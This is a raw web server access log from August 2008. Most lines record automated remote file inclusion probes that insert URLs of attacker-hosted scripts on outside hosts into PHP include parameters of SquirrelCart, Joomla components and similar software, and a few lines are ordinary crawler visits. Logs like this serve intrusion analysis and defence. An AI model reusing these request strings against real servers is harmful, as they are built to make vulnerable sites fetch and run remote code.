217.23.156.36 - - [07/Aug/2008:03:59:43 -0500] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
217.23.156.36 - - [07/Aug/2008:03:59:43 -0500] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
72.9.233.10 - - [07/Aug/2008:04:00:53 -0500] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:04:00:53 -0500] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
72.55.148.240 - - [07/Aug/2008:04:01:46 -0500] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
72.55.148.240 - - [07/Aug/2008:04:01:46 -0500] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
200.251.162.130 - - [07/Aug/2008:04:02:20 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:04:02:21 -0500] "GET /logs///vwar/backup/errors.php?error=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
70.86.186.90 - - [07/Aug/2008:04:02:39 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
70.86.186.90 - - [07/Aug/2008:04:02:39 -0500] "GET //?path%5Bdocroot%5D=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
70.86.186.90 - - [07/Aug/2008:04:02:40 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.811"
200.203.121.1 - - [07/Aug/2008:04:03:04 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:04:03:04 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:04:03:04 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart_content.php?cart_isp_root=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
200.251.162.130 - - [07/Aug/2008:04:03:22 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
70.86.186.90 - - [07/Aug/2008:04:03:24 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.811"
70.86.186.90 - - [07/Aug/2008:04:03:25 -0500] "GET //?path%5Bdocroot%5D=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
91.84.19.133 - - [07/Aug/2008:04:03:49 -0500] "GET /logs/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
91.84.19.133 - - [07/Aug/2008:04:03:49 -0500] "GET /errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.133.102.211 - - [07/Aug/2008:04:06:19 -0500] "GET /logs/access_log.1211155200//admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:04:06:19 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:04:06:20 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:04:06:25 -0500] "GET /logs/access_log.1214697600//admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.806"
91.84.19.133 - - [07/Aug/2008:04:10:00 -0500] "GET /errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.251.162.130 - - [07/Aug/2008:04:10:27 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:04:10:39 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
70.86.186.90 - - [07/Aug/2008:04:14:28 -0500] "GET //?path%5Bdocroot%5D=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
74.6.18.231 - - [07/Aug/2008:04:18:16 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3799 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.57.154.47 - - [07/Aug/2008:04:21:19 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:04:21:19 -0500] "GET /errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:04:21:19 -0500] "GET /logs/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:04:22:51 -0500] "GET //profile.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:04:22:51 -0500] "GET /logs//profile.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:04:24:10 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:04:24:12 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
217.23.156.36 - - [07/Aug/2008:04:24:27 -0500] "GET /logs//profile.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
217.23.156.36 - - [07/Aug/2008:04:24:27 -0500] "GET //profile.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
72.55.148.240 - - [07/Aug/2008:04:24:47 -0500] "GET /logs//profile.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
72.55.148.240 - - [07/Aug/2008:04:24:47 -0500] "GET //profile.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
74.6.18.231 - - [07/Aug/2008:04:25:36 -0500] "GET /logs/access_log.1214438400 HTTP/1.0" 200 539400 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.214.45.147 - - [07/Aug/2008:04:25:55 -0500] "GET /artwork/dressers.htm HTTP/1.0" 200 1093 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
69.73.136.95 - - [07/Aug/2008:04:25:56 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
69.73.136.95 - - [07/Aug/2008:04:25:56 -0500] "GET //squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
69.73.136.95 - - [07/Aug/2008:04:25:56 -0500] "GET /logs//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
69.57.154.47 - - [07/Aug/2008:04:26:03 -0500] "GET /logs/access_log.1214438400//modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
86.58.154.237 - - [07/Aug/2008:04:28:27 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
86.58.154.237 - - [07/Aug/2008:04:28:27 -0500] "GET /errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
86.58.154.237 - - [07/Aug/2008:04:28:28 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
86.58.154.237 - - [07/Aug/2008:04:28:28 -0500] "GET /logs/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
86.58.154.237 - - [07/Aug/2008:04:28:28 -0500] "GET /errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
86.58.154.237 - - [07/Aug/2008:04:28:28 -0500] "GET /logs/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.6.18.231 - - [07/Aug/2008:04:28:34 -0500] "GET /logs/access_log.1175558400 HTTP/1.0" 200 233364 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.203.121.1 - - [07/Aug/2008:04:29:08 -0500] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:04:29:08 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:04:29:08 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:04:29:41 -0500] "GET /logs/access_log.1206230400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
70.86.186.90 - - [07/Aug/2008:04:29:44 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
70.86.186.90 - - [07/Aug/2008:04:29:44 -0500] "GET /logs//?path%5Bdocroot%5D=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.811"
212.92.23.89 - - [07/Aug/2008:04:30:07 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
69.57.154.47 - - [07/Aug/2008:04:30:20 -0500] "GET /logs/access_log.1212883200//modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.224.152.230 - - [07/Aug/2008:04:30:24 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
80.231.0.98 - - [07/Aug/2008:04:31:44 -0500] "GET //?path%5Bdocroot%5D=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
80.231.0.98 - - [07/Aug/2008:04:31:44 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
80.231.0.98 - - [07/Aug/2008:04:31:51 -0500] "GET /logs//?path%5Bdocroot%5D=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.79"
91.84.19.133 - - [07/Aug/2008:04:32:38 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
91.84.19.133 - - [07/Aug/2008:04:32:39 -0500] "GET /errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
91.84.19.133 - - [07/Aug/2008:04:32:40 -0500] "GET /logs/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.203.121.1 - - [07/Aug/2008:04:35:02 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:04:35:02 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
91.84.19.133 - - [07/Aug/2008:04:35:14 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
91.84.19.133 - - [07/Aug/2008:04:35:15 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.34.175.15 - - [07/Aug/2008:04:36:44 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
74.6.18.216 - - [07/Aug/2008:04:37:32 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.86.165 - - [07/Aug/2008:04:37:33 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
200.251.162.130 - - [07/Aug/2008:04:37:54 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
212.92.23.89 - - [07/Aug/2008:04:40:49 -0500] "GET /logs/errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
65.214.44.28 - - [07/Aug/2008:04:44:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
200.203.121.1 - - [07/Aug/2008:04:44:36 -0500] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:04:44:39 -0500] "GET /logs//naboard_pnr.php?skin=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
200.203.121.1 - - [07/Aug/2008:04:44:39 -0500] "GET //naboard_pnr.php?skin=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
65.214.44.28 - - [07/Aug/2008:04:44:41 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
200.34.175.15 - - [07/Aug/2008:04:47:14 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
200.34.175.15 - - [07/Aug/2008:04:47:41 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
200.34.175.15 - - [07/Aug/2008:04:47:49 -0500] "GET /errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
89.208.43.121 - - [07/Aug/2008:04:50:57 -0500] "GET /logs/access_log.1216598400//index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:04:50:58 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [07/Aug/2008:04:50:58 -0500] "GET //index.php?DOCUMENT_ROOT=http://pikappaalpha.net/images/idd.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.34.175.15 - - [07/Aug/2008:04:53:08 -0500] "GET /errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
200.34.175.15 - - [07/Aug/2008:04:53:49 -0500] "GET /errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
212.92.23.89 - - [07/Aug/2008:04:54:06 -0500] "GET /logs/errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.34.175.15 - - [07/Aug/2008:04:56:49 -0500] "GET /errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.79.163.110 - - [07/Aug/2008:04:58:27 -0500] "GET /logs//include/write.php?dir=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
66.79.163.110 - - [07/Aug/2008:04:58:27 -0500] "GET //include/write.php?dir=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
66.225.218.2 - - [07/Aug/2008:04:59:03 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://student-x.com/test.txt%0D? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
66.225.218.2 - - [07/Aug/2008:04:59:03 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://student-x.com/test.txt%0D? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.92.23.89 - - [07/Aug/2008:05:01:30 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
217.23.156.36 - - [07/Aug/2008:05:02:31 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://student-x.com/test.txt?? HTTP/1.1" 404 350 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
217.23.156.36 - - [07/Aug/2008:05:02:31 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://student-x.com/test.txt?? HTTP/1.1" 404 345 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
213.133.102.211 - - [07/Aug/2008:05:03:17 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.806"
66.79.163.110 - - [07/Aug/2008:05:03:19 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
66.79.163.110 - - [07/Aug/2008:05:03:19 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
213.133.102.211 - - [07/Aug/2008:05:03:22 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:05:03:24 -0500] "GET /logs/access_log.1206230400//faqsupport/samplefaqsupport.php?path[docroot]=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:05:04:07 -0500] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path[docroot]=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:05:04:08 -0500] "GET /logs/access_log.1205971200//faqsupport/samplefaqsupport.php?path[docroot]=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.806"
200.5.113.34 - - [07/Aug/2008:05:05:11 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.5.113.34 - - [07/Aug/2008:05:05:11 -0500] "GET /errors.php?error=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.5.113.34 - - [07/Aug/2008:05:05:11 -0500] "GET /logs/errors.php?error=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.79.163.110 - - [07/Aug/2008:05:05:25 -0500] "GET //include/write.php?dir=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
72.9.233.10 - - [07/Aug/2008:05:06:39 -0500] "GET /logs//blog.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.9.233.10 - - [07/Aug/2008:05:06:39 -0500] "GET //blog.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
212.92.23.89 - - [07/Aug/2008:05:07:33 -0500] "GET /logs//errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.55.148.240 - - [07/Aug/2008:05:08:16 -0500] "GET /logs//blog.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.55.148.240 - - [07/Aug/2008:05:08:16 -0500] "GET //blog.php?sIncPath=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
217.23.156.36 - - [07/Aug/2008:05:08:39 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://student-x.com/test.txt%0D? HTTP/1.1" 404 333 "-""Advanced Browser (http://www.avantbrowser.com)"
217.23.156.36 - - [07/Aug/2008:05:09:01 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://student-x.com/test.txt%0D? HTTP/1.1" 404 333 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
89.111.176.90 - - [07/Aug/2008:05:10:41 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:10:41 -0500] "GET //?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
80.231.0.98 - - [07/Aug/2008:05:11:02 -0500] "GET /errors.php?error=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
80.231.0.98 - - [07/Aug/2008:05:11:02 -0500] "GET /logs/errors.php?error=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
89.111.179.10 - - [07/Aug/2008:05:11:31 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:05:11:32 -0500] "GET //?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:11:36 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
89.111.176.90 - - [07/Aug/2008:05:11:37 -0500] "GET //?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
208.75.225.10 - - [07/Aug/2008:05:12:34 -0500] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://ez-weblog.com/css/id4.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
208.75.225.10 - - [07/Aug/2008:05:12:34 -0500] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://ez-weblog.com/css/id4.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
216.246.78.8 - - [07/Aug/2008:05:14:05 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
216.246.78.8 - - [07/Aug/2008:05:14:05 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
212.92.23.89 - - [07/Aug/2008:05:14:59 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:15:39 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:15:44 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:15:49 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
217.20.138.101 - - [07/Aug/2008:05:15:54 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
217.20.138.101 - - [07/Aug/2008:05:15:54 -0500] "GET //squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:05:15:55 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
217.20.138.101 - - [07/Aug/2008:05:15:55 -0500] "GET /logs//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
217.20.138.101 - - [07/Aug/2008:05:15:56 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
217.20.138.101 - - [07/Aug/2008:05:15:56 -0500] "GET //squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
